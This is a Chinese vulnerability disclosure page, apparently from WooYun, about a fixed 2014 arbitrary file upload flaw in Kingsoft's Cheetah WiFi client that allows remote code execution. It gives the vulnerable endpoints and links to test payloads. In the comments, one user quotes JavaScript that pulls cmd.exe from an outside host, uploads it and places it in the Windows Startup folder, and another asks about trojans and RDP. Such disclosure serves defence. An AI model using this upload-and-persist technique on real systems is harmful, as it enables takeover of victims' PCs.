漏洞概要
关注数(62)
关注此漏洞
漏洞标题: 金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机
提交时间: 2014-08-14 18:01
修复时间: 2014-11-12 18:02
公开时间: 2014-11-12 18:02
漏洞类型: 远程代码执行
危害等级: 中
自评Rank: 20
漏洞状态:
厂商已经修复
漏洞详情
披露状态:
2014-08-14: 细节已通知厂商并且等待厂商处理中
2014-08-14: 厂商已经确认,细节仅向厂商公开
2014-10-08: 细节向核心白帽子及相关领域专家公开
2014-10-18: 细节向普通白帽子公开
2014-10-28: 细节向实习白帽子公开
2014-11-12: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
闪电有没有?
详细说明:
漏洞程序:
Kwifi V4.0.140813 猎豹wifi最新版本
测试环境:
Windows 7 64bit
Kwifi V4.0.140813
Firefox 31.0
Chrome 36.0.1985.143 m
漏洞详情:
当猎豹wifi运行后会向外网开放8735端口(运行web),而其某接口存在漏洞导致任意文件上传,从而导致pc机沦陷。
http://target:8735/tool/#upload
http://target:8735/api/replypic 存在漏洞导致任意文件上传
漏洞危害:
默认装C盘 可以实现挂马,指定入侵,拓展大企业内网监控pc机等;
部分测试环境默认安装在D盘(wooyun工作人员测试时出现,我测试时无论是官网最新版本还是百度下载的猎豹wifi都装在C盘);
漏洞证明:
当kwifi外网环境时:
当kwifi为内网环境时:
firefox 和google chrome下有效
修复方案:
视频:http://**.**.**.**/kwifi.wmv
演示个cmd,上马过金山等也是可以的~
下面给一个通用型测试payload:
若安装到c盘,则开启wifi后访问下述链接,安装cmd.exe程序到系统启动项
http://**.**.**.**/kwifi/2.html
若安装到d盘,则开启wifi后访问下述链接,安装cmd.exe程序到d盘根目录
http://**.**.**.**/kwifi/3.html
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-08-14 19:53
厂商回复:
非常感谢您的提交
最新状态:
2014-11-12:已经修复
2014-11-12:漏洞已修复
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(少于3人评价):
评价
-
2014-08-14 18:12 |
zeracker
( 普通白帽子 |
Rank:1077 漏洞数:134 | 爱吃小龙虾。)
0
-
2014-08-14 18:13 |
itleaf
( 普通白帽子 |
Rank:140 漏洞数:17 )
0
-
2014-08-14 18:31 |
疯狗
( 实习白帽子 |
Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
1
-
2014-08-14 18:34 |
itleaf
( 普通白帽子 |
Rank:140 漏洞数:17 )
0
-
2014-08-14 18:38 |
疯狗
( 实习白帽子 |
Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
0
-
2014-08-14 18:50 |
安然意境
( 普通白帽子 |
Rank:194 漏洞数:70 | 暗室中很难找到黑猫,尤其当里面根本没猫的...)
0
-
2014-08-14 19:04 |
大大灰狼
( 普通白帽子 |
Rank:278 漏洞数:43 | Newbie)
0
-
2014-08-14 19:49 |
HackBraid
( 普通白帽子 |
Rank:1854 漏洞数:197 | 风暴网络安全空间:
http://www.heysec.or...)
0
-
2014-08-14 21:09 |
xsser
( 普通白帽子 |
Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
0
-
2014-08-14 21:23 |
itleaf
( 普通白帽子 |
Rank:140 漏洞数:17 )
0
-
2014-08-15 13:08 |
itleaf
( 普通白帽子 |
Rank:140 漏洞数:17 )
0
厂商最新版已经修复,百度搜索下载任有效,安装到D盘,请删除D盘Program Files (x86)文件夹或在虚拟机里测试,win7 64bit firefox chrome测试成功,exp自行按需更改
-
2014-11-12 19:06 |
大白菜
( 实习白帽子 |
Rank:52 漏洞数:19 )
1
。。不明白CMD哪来的你说的上传也没见上传CMD啊
-
2014-11-12 19:27 |
itleaf
( 普通白帽子 |
Rank:140 漏洞数:17 )
1
-
2014-11-12 19:42 |
萌萌哒-花粉
( 路人 |
还没有发布任何漏洞 | 多乌云 多美女 花粉 顾名思义 就是校花班花...)
1
金山 我喜欢这厂商
虽然和我想不不一样 但是的确很刁 值得学习
-
2014-11-12 20:27 |
1c3z
( 普通白帽子 |
Rank:297 漏洞数:55 | @)!^)
1
@大白菜
在script有下面这段代码
var start = function() {
var c = load_binary_resource('cmd.exe');
fileUpload(c, 'cmd.exe');
};
start();
先用ajax的方式远程读取cmd.exe再上传
cmd.exe地址
http://xssae.sinaapp.com/kwifi/cmd.exe
-
2014-11-13 00:02 |
大白菜
( 实习白帽子 |
Rank:52 漏洞数:19 )
1
@1c3z ...那能执行添加用户的命令吗?或者开3389 或者执行远程木马
-
2014-11-13 11:08 |
1c3z
( 普通白帽子 |
Rank:297 漏洞数:55 | @)!^)
1
@大白菜
安装cmd.exe程序到系统启动项
ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup
开机自启动
-
2014-11-13 14:37 |
大白菜
( 实习白帽子 |
Rank:52 漏洞数:19 )
1